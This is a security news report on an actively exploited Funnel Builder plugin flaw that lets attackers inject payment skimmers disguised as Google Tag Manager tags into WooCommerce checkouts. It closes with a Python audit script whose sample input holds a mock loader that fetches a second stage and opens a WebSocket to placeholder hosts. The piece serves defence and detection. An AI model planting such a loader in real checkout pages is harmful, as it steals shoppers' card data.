
A critical vulnerability in the WordPress Funnel Builder plugin is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages, according to Sansec researchers.
Funnel Builder by FunnelKit is a checkout and upsell plugin installed on over 40,000 WooCommerce stores.
Attackers injected e-skimmer code designed to steal customers’ card and payment details during purchases. Website owners using the plugin are urged to apply security updates immediately and review checkout pages for signs of compromise.
“Attackers are planting fake Google Tag Manager scripts into the plugin’s ‘External Scripts’ setting. The injected code looks like ordinary analytics next to the store’s real tags, but loads a payment skimmer that steals credit card numbers, CVVs and billing addresses from checkout,” reads the report published by Sansec.
The researchers state that a critical flaw in the WordPress Funnel Builder plugin lets unauthenticated attackers inject malicious scripts into WooCommerce checkout pages. The vulnerable endpoint fails to verify permissions and allows attackers to modify global plugin settings, including the “External Scripts” option. By planting a malicious <script> tag, attackers can skim payment data from every checkout transaction.
“An unauthenticated request can therefore reach the internal method that writes attacker-controlled data straight into the plugin’s global settings,” continues the report. “Whatever sits in the ‘External Scripts’ setting then gets printed onto every Funnel Builder checkout page, so an attacker can plant a <script> tag that runs on every checkout transaction across the site.”
The patch adds proper permission checks and limits access to approved methods only.
Sansec observed attackers abusing the Funnel Builder flaw to inject malware disguised as a Google Tag Manager or Analytics script. The fake loader silently downloads a second-stage script from an attacker-controlled domain and opens a WebSocket connection to a remote C2 server (“wss://protect-wss[.]com/ws”). Then, a custom payment skimmer is delivered to steal credit card numbers, CVVs, billing addresses, and other customer data during checkout.
Attackers mimic trusted tracking tags to avoid detection.
FunnelKit urged customers to immediately update Funnel Builder to version 3.15.0.3 after discovering a flaw that allowed attackers to inject malicious scripts into checkout pages. Users are also advised to review the plugin’s External Scripts settings and remove any unknown code. Security experts further recommend scanning affected stores to detect skimmers, malware, backdoors, or other signs of compromise.
Sansec also provided indicators of compromise (IoCs).
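As an added example (not code from the Sansec report or from FunnelKit), the following Python audit implements the review step recommended above: it scans the contents of the plugin’s External Scripts setting for script tags that load from, or open WebSockets to, hosts outside an approved list, which is how a fake Google Tag Manager loader of the kind described above would stand out next to the genuine one. The approved-host list, the sample setting and its placeholder hosts are assumptions.

```python
import re
from urllib.parse import urlparse

# Hosts this store legitimately loads tag/analytics code from (assumption:
# replace with the vendors the store actually uses).
APPROVED_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.S | re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*['\"]([^'\"]+)", re.I)
# Absolute or protocol-relative URLs, including WebSocket endpoints that an
# inline loader may build at runtime (e.g. j.src='//host/gtm.js').
URL_RE = re.compile(r"(?:https?:|wss?:)?//[A-Za-z0-9.-]+(?:/[^\s'\"<>]*)?")


def audit_external_scripts(setting_html, approved_hosts=APPROVED_HOSTS):
    """Flag every <script> in the External Scripts setting that loads from,
    or connects to, a host outside the approved set. Empty list = clean."""
    findings = []
    for attrs, body in SCRIPT_RE.findall(setting_html):
        urls = URL_RE.findall(body)
        src = SRC_RE.search(attrs)
        if src:
            urls.append(src.group(1))
        for url in urls:
            # Protocol-relative URLs inherit the page scheme; assume https.
            parsed = urlparse("https:" + url if url.startswith("//") else url)
            host = parsed.hostname or ""
            if parsed.scheme in ("ws", "wss"):
                # No tag needs a socket from checkout; the report describes
                # the skimmer's C2 channel exactly this way.
                findings.append(f"websocket: {url}")
            elif host not in approved_hosts:
                findings.append(f"unapproved host {host}: {url}")
    return findings


# Constructed sample: the genuine GTM snippet followed by a look-alike loader
# that fetches its second stage from another host and opens a WebSocket.
# Hosts are placeholders, not the indicators from the Sansec report.
SAMPLE_SETTING = """
<script>(function(w,d,s,l,i){w[l]=w[l]||[];var f=d.getElementsByTagName(s)[0],
j=d.createElement(s);j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i;
f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-XXXXXX');</script>
<script>(function(w,d,s){var j=d.createElement(s);j.async=true;
j.src='//tag-loader.invalid/gtm.js';d.head.appendChild(j);
new WebSocket('wss://c2.invalid/ws');})(window,document,'script');</script>
"""

if __name__ == "__main__":
    for finding in audit_external_scripts(SAMPLE_SETTING):
        print(finding)
```

Run it against the value stored for the plugin’s External Scripts option (exported from the database or copied from the settings screen); any finding is a script that does not belong there and should be removed before re-scanning the store.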
(SecurityAffairs – hacking, WordPress)